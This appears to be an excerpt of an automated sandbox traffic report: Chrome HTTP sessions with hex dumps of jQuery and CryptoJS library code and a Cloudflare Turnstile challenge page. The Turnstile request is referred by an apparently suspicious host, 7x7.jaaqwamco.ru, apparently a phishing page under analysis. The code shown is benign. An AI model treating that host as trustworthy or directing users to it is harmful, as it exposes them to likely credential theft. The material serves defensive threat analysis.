                                                                              Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                              2024-11-26 19:54:42 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                              Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                              2024-11-26 19:54:42 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                              Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              22192.168.2.1649738104.17.25.144436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:42 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                              Host: cdnjs.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:54:42 UTC959INHTTP/1.1 200 OK
                                                                              Date: Tue, 26 Nov 2024 19:54:42 GMT
                                                                              Content-Type: application/javascript; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Access-Control-Allow-Origin: *
                                                                              Cache-Control: public, max-age=30672000
                                                                              ETag: W/"61182885-40eb"
                                                                              Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                              cf-cdnjs-via: cfworker/kv
                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                              Timing-Allow-Origin: *
                                                                              X-Content-Type-Options: nosniff
                                                                              CF-Cache-Status: HIT
                                                                              Age: 1482152
                                                                              Expires: Sun, 16 Nov 2025 19:54:42 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VJp8CrV5j9nkyI6DtBulNxUQGsCKL4nvOLmAiWQvZ8ThbU%2F%2FzbpylQN32hVn3Pdnm3YhzMit%2FYzj95yRAP755pDeT25ShhcLciHN3trNNz1NLqlLOaGp4spO99e2Cq1gJ7ARXvdW"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                              Strict-Transport-Security: max-age=15780000
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e8c6e916e7317b5-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-11-26 19:54:42 UTC410INData Raw: 37 62 66 32 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                              Data Ascii: 7bf2!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                              2024-11-26 19:54:42 UTC1369INData Raw: 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65
                                                                              Data Ascii: f globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.cre
                                                                              2024-11-26 19:54:42 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73
                                                                              Data Ascii: call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes
                                                                              2024-11-26 19:54:42 UTC1369INData Raw: 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63
                                                                              Data Ascii: peof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c
                                                                              2024-11-26 19:54:42 UTC1369INData Raw: 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e
                                                                              Data Ascii: var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>
                                                                              2024-11-26 19:54:42 UTC1369INData Raw: 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30
                                                                              Data Ascii: for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0
                                                                              2024-11-26 19:54:42 UTC1369INData Raw: 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66
                                                                              Data Ascii: r,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:f
                                                                              2024-11-26 19:54:42 UTC1369INData Raw: 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50
                                                                              Data Ascii: harAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOP
                                                                              2024-11-26 19:54:42 UTC1369INData Raw: 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69
                                                                              Data Ascii: a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=thi
                                                                              2024-11-26 19:54:42 UTC1369INData Raw: 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41
                                                                              Data Ascii: ),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              23192.168.2.1649740104.18.95.414436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:44 UTC799OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/lgd21/0x4AAAAAAA0MpIT_R9fG8S2s/auto/fbE/normal/auto/ HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-Dest: iframe
                                                                              Referer: https://7x7.jaaqwamco.ru/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:54:44 UTC1362INHTTP/1.1 200 OK
                                                                              Date: Tue, 26 Nov 2024 19:54:44 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 26460
                                                                              Connection: close
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                              content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                              cross-origin-embedder-policy: require-corp
                                                                              cross-origin-opener-policy: same-origin
                                                                              cross-origin-resource-policy: cross-origin
                                                                              origin-agent-cluster: ?1
                                                                              accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                              critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                              referrer-policy: same-origin
                                                                              document-policy: js-profiling
                                                                              2024-11-26 19:54:44 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 65 38 63 36 65 39 62 31 62 31 62 34 33 37 61 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                              Data Ascii: Server: cloudflareCF-RAY: 8e8c6e9b1b1b437a-EWRalt-svc: h3=":443"; ma=86400
                                                                              2024-11-26 19:54:44 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                              2024-11-26 19:54:44 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                              Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
